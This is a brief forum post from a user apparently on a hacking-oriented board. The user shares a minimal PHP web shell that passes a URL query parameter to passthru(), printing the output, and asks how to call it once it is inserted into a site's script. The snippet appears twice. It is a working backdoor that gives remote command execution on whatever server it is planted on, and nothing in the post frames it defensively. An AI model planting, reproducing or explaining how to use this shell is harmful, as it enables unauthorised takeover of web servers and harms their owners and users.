Nwekerooney
Registered
- Joined
- Jan 1, 2021
- Messages
- 44
- Reaction score
- 2
- Points
- 2
if i put this code in php script
how can i use this ?
if(isset($_GET['lol'])){
echo '<pre>';
passthru($_GET['lol']);
exit();
}
www.site.com/index?lol.php ?
can some one help
how can i use this ?
if(isset($_GET['lol'])){
echo '<pre>';
passthru($_GET['lol']);
exit();
}
www.site.com/index?lol.php ?
can some one help